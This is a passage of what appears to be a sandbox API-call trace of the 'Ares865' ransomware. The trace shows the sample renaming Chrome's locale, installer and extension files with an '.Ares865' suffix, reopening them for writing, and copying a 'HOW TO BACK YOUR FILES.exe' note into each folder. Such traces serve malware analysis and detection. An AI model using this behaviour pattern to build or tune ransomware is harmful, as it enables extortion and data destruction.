returned 85 [0144.292] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sw.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sw.pak.ares865"), dwFlags=0x1) returned 1 [0144.295] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sw.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.296] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=281460) returned 1 [0144.312] lstrcpyW (in: lpString1=0x2cce48e, lpString2="ta.pak" | out: lpString1="ta.pak") returned="ta.pak" [0144.312] lstrlenW (lpString="ta.pak") returned 6 [0144.312] lstrlenW (lpString="Ares865") returned 7 [0144.312] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak.Ares865") returned 85 [0144.312] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ta.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ta.pak.ares865"), dwFlags=0x1) returned 1 [0144.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ta.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.314] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=773454) returned 1 [0144.355] lstrcpyW (in: lpString1=0x2cce48e, lpString2="te.pak" | out: lpString1="te.pak") returned="te.pak" [0144.355] lstrlenW (lpString="te.pak") returned 6 [0144.355] lstrlenW (lpString="Ares865") returned 7 [0144.356] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak.Ares865") returned 85 [0144.356] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\te.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\te.pak.ares865"), dwFlags=0x1) returned 1 [0144.359] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\te.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.359] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=723837) returned 1 [0144.396] lstrcpyW (in: lpString1=0x2cce48e, lpString2="th.pak" | out: lpString1="th.pak") returned="th.pak" [0144.396] lstrlenW (lpString="th.pak") returned 6 [0144.396] lstrlenW (lpString="Ares865") returned 7 [0144.396] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak.Ares865") returned 85 [0144.397] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\th.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\th.pak.ares865"), dwFlags=0x1) returned 1 [0144.399] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\th.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.399] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=651192) returned 1 [0144.433] lstrcpyW (in: lpString1=0x2cce48e, lpString2="tr.pak" | out: lpString1="tr.pak") returned="tr.pak" [0144.433] lstrlenW (lpString="tr.pak") returned 6 [0144.433] lstrlenW (lpString="Ares865") returned 7 [0144.434] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak.Ares865") returned 85 [0144.434] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\tr.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\tr.pak.ares865"), dwFlags=0x1) returned 1 [0144.438] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\tr.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.438] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=324872) returned 1 [0144.456] lstrcpyW (in: lpString1=0x2cce48e, lpString2="uk.pak" | out: lpString1="uk.pak") returned="uk.pak" [0144.456] lstrlenW (lpString="uk.pak") returned 6 [0144.456] lstrlenW (lpString="Ares865") returned 7 [0144.457] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak.Ares865") returned 85 [0144.457] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\uk.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\uk.pak.ares865"), dwFlags=0x1) returned 1 [0144.459] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\uk.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.459] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=516540) returned 1 [0144.489] lstrcpyW (in: lpString1=0x2cce48e, lpString2="vi.pak" | out: lpString1="vi.pak") returned="vi.pak" [0144.489] lstrlenW (lpString="vi.pak") returned 6 [0144.489] lstrlenW (lpString="Ares865") returned 7 [0144.489] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak.Ares865") returned 85 [0144.489] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\vi.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\vi.pak.ares865"), dwFlags=0x1) returned 1 [0144.491] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\vi.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.492] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=372546) returned 1 [0144.512] lstrcpyW (in: lpString1=0x2cce48e, lpString2="zh-CN.pak" | out: lpString1="zh-CN.pak") returned="zh-CN.pak" [0144.512] lstrlenW (lpString="zh-CN.pak") returned 9 [0144.512] lstrlenW (lpString="Ares865") returned 7 [0144.512] lstrcmpiW (lpString1="-CN.pak", lpString2="Ares865") returned 1 [0144.512] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak.Ares865") returned 88 [0144.521] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-cn.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-cn.pak.ares865"), dwFlags=0x1) returned 1 [0144.524] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-cn.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.524] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=270716) returned 1 [0144.560] lstrcpyW (in: lpString1=0x2cce48e, lpString2="zh-TW.pak" | out: lpString1="zh-TW.pak") returned="zh-TW.pak" [0144.560] lstrlenW (lpString="zh-TW.pak") returned 9 [0144.560] lstrlenW (lpString="Ares865") returned 7 [0144.560] lstrcmpiW (lpString1="-TW.pak", lpString2="Ares865") returned 1 [0144.560] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak.Ares865") returned 88 [0144.560] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-tw.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-tw.pak.ares865"), dwFlags=0x1) returned 1 [0144.562] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-tw.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.562] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=270740) returned 1 [0144.593] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer" [0144.593] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer" [0144.593] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0144.593] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0144.595] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0144.595] GetLastError () returned 0x0 [0144.597] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0144.597] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53401120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53401120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0144.597] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0144.597] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0144.597] lstrcpyW (in: lpString1=0x2cce492, lpString2="chrmstp.exe" | out: lpString1="chrmstp.exe") returned="chrmstp.exe" [0144.597] lstrlenW (lpString="chrmstp.exe") returned 11 [0144.597] lstrlenW (lpString="Ares865") returned 7 [0144.597] lstrcmpiW (lpString1="stp.exe", lpString2="Ares865") returned 1 [0144.598] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrmstp.exe.Ares865") returned 92 [0144.598] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrmstp.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrmstp.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrmstp.exe.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrmstp.exe.ares865"), dwFlags=0x1) returned 1 [0144.603] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrmstp.exe.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrmstp.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.603] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1720152) returned 1 [0144.772] lstrcpyW (in: lpString1=0x2cce492, lpString2="chrome.7z" | out: lpString1="chrome.7z") returned="chrome.7z" [0144.772] lstrlenW (lpString="chrome.7z") returned 9 [0144.772] lstrlenW (lpString="Ares865") returned 7 [0144.773] lstrcmpiW (lpString1="rome.7z", lpString2="Ares865") returned 1 [0144.773] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.Ares865") returned 90 [0144.773] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.ares865"), dwFlags=0x1) returned 1 [0144.776] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.776] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=181915691) returned 1 [0144.967] lstrcpyW (in: lpString1=0x2cce492, lpString2="setup.exe" | out: lpString1="setup.exe") returned="setup.exe" [0144.967] lstrlenW (lpString="setup.exe") returned 9 [0144.967] lstrlenW (lpString="Ares865") returned 7 [0144.967] lstrcmpiW (lpString1="tup.exe", lpString2="Ares865") returned 1 [0144.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\setup.exe.Ares865") returned 90 [0144.968] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\setup.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\setup.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\setup.exe.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\setup.exe.ares865"), dwFlags=0x1) returned 1 [0144.972] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\setup.exe.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\setup.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.972] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1720152) returned 1 [0145.057] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions" [0145.058] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions" [0145.058] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0145.058] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\how to back your files.exe"), bFailIfExists=1) returned 0 [0145.060] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0145.060] GetLastError () returned 0x0 [0145.061] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0145.061] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53427280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53427280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0145.061] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0145.061] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0145.061] lstrcpyW (in: lpString1=0x2cce494, lpString2="external_extensions.json" | out: lpString1="external_extensions.json") returned="external_extensions.json" [0145.061] lstrlenW (lpString="external_extensions.json") returned 24 [0145.061] lstrlenW (lpString="Ares865") returned 7 [0145.061] lstrcmpiW (lpString1="ns.json", lpString2="Ares865") returned 1 [0145.062] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\external_extensions.json.Ares865") returned 106 [0145.062] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\external_extensions.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\external_extensions.json"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\external_extensions.json.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\external_extensions.json.ares865"), dwFlags=0x1) returned 1 [0145.064] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\external_extensions.json.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\external_extensions.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.064] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=99) returned 1 [0145.068] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps" [0145.068] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps" [0145.068] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0145.068] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\how to back your files.exe"), bFailIfExists=1) returned 0 [0145.069] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0145.069] GetLastError () returned 0x0 [0145.070] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0145.070] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53427280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53427280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0145.070] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0145.070] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0145.070] lstrcpyW (in: lpString1=0x2cce498, lpString2="docs.crx" | out: lpString1="docs.crx") returned="docs.crx" [0145.070] lstrlenW (lpString="docs.crx") returned 8 [0145.070] lstrlenW (lpString="Ares865") returned 7 [0145.070] lstrcmpiW (lpString1="ocs.crx", lpString2="Ares865") returned 1 [0145.071] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\docs.crx.Ares865") returned 92 [0145.071] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\docs.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\docs.crx"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\docs.crx.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\docs.crx.ares865"), dwFlags=0x1) returned 1 [0145.072] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\docs.crx.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\docs.crx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.072] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4578) returned 1 [0145.075] lstrcpyW (in: lpString1=0x2cce498, lpString2="drive.crx" | out: lpString1="drive.crx") returned="drive.crx" [0145.075] lstrlenW 